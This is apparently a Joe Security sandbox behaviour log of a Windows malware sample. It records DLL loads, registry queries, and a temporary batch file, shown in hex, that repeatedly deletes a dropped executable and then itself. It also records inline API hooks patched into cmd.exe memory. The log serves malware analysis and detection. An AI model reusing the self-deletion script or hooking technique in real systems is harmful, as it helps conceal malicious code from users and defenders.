Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2819976192
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2820119551
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2820212416
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2820296593
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2820298136
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2820569507
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2820660726
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2820941102
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2820975089
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2821012250
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2821013765
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 510000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2821151361
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 490000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2821774871
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 490000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2821823354
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2821825489
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 9F0000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2822396648
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2822513199
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2822523250
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 4C0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2822660180
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 4C0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2822670244
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 4C0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2822681183
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2822788238
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 9F0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2822844006
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 9F0000 Size: 618496 Protection: readonly Mapped to pid: own pid object name not found 2823491128
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2823492643
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2823790784
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2823993912
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2824270316
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2824355296
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2825094081
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: 9F0000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2825403365
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2826602957
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck object name not found 2826700604
Memory allocated PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 9F0000 Length: 2DF8C8 Allocation Type: null Protection: page read and write success or wait 2826701048
Memory allocated PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 9F0000 Length: 2DF8CC Allocation Type: null Protection: page read and write success or wait 2826701324
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions success or wait 2826713903
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion object name not found 2826725165
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor success or wait 2826788976
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar success or wait 2826807813
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar success or wait 2826858310
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun success or wait 2826860263
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck object name not found 2826871270
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions success or wait 2826893073
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion object name not found 2826895646
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor success or wait 2826916538
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar success or wait 2826962969
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar object name not found 2826964163
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun object name not found 2826965358
Memory allocated PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A70000 Length: 13FE10 Allocation Type: null Protection: page read and write success or wait 2827095443
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Access: query and read Type: commit Baseaddress: A80000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2827929237
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828053270
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828056340
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 8192 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 success or wait 2828060740
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828102646
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828110461
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828123219
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828150903
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828162771
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 8192 Value: 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D success or wait 2828166859
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828268890
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828273269
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828278434
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828357998
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828359378
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 8192 Value: 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 success or wait 2828362722
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828384865
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828387937
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828391536
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2828448996
File deleted Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 2828458033
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: Enabled object name not found 2828462125
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: EnabledV8 success or wait 2828478985
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: CleanCookies success or wait 2828498258
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: CleanCookies success or wait 2828500660
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1406 success or wait 2828503651
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1609 success or wait 2828513050
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1406 success or wait 2828520621
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1609 success or wait 2828548670
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1406 success or wait 2828568301
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1609 success or wait 2828571904
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1406 success or wait 2828633793
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1609 success or wait 2828636818
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1406 success or wait 2828649567
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1609 success or wait 2828652996
Memory allocated PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A90000 Length: 2DF4C0 Allocation Type: null Protection: page execute and read and write success or wait 2828687053
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2828688108
Memory read PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2828688408
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A90000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 E7 7B success or wait 2828716590
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828727705
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828729570
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 8192 Value: 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A success or wait 2828731223
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828750028
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE 85 83 success or wait 2828750266
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828753283
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2828754489
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828775671
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2828780208
Memory read PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2828787665
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828805751
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828821658
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A9000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 E8 7B success or wait 2828822659
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 8192 Value: 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 61 63 38 64 31 32 37 34 2E 62 61 74 22 0D 0A 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A success or wait 2828850211
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828867035
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 5 Value: E9 09 1F 85 83 success or wait 2828870193
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828870728
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2828873462
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2828882487
Memory read PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2828885380
File deleted Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828892544
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A90014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 78 76 success or wait 2828903227
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false object name not found 2828903823
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 77212EBC Length: 5 Value: E9 FD 4B F4 88 success or wait 2828959157
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 77212EBC Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2828963202
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2828967128
Memory read PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2828968341
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A9001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 73 76 success or wait 2828990788
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A F9 88 success or wait 2828991816
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 771C60A1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2828992136
Copyright 2011 Joe Security | All rights reserved | www.joesecurity.org | This page is optimized for firefox - 1024x786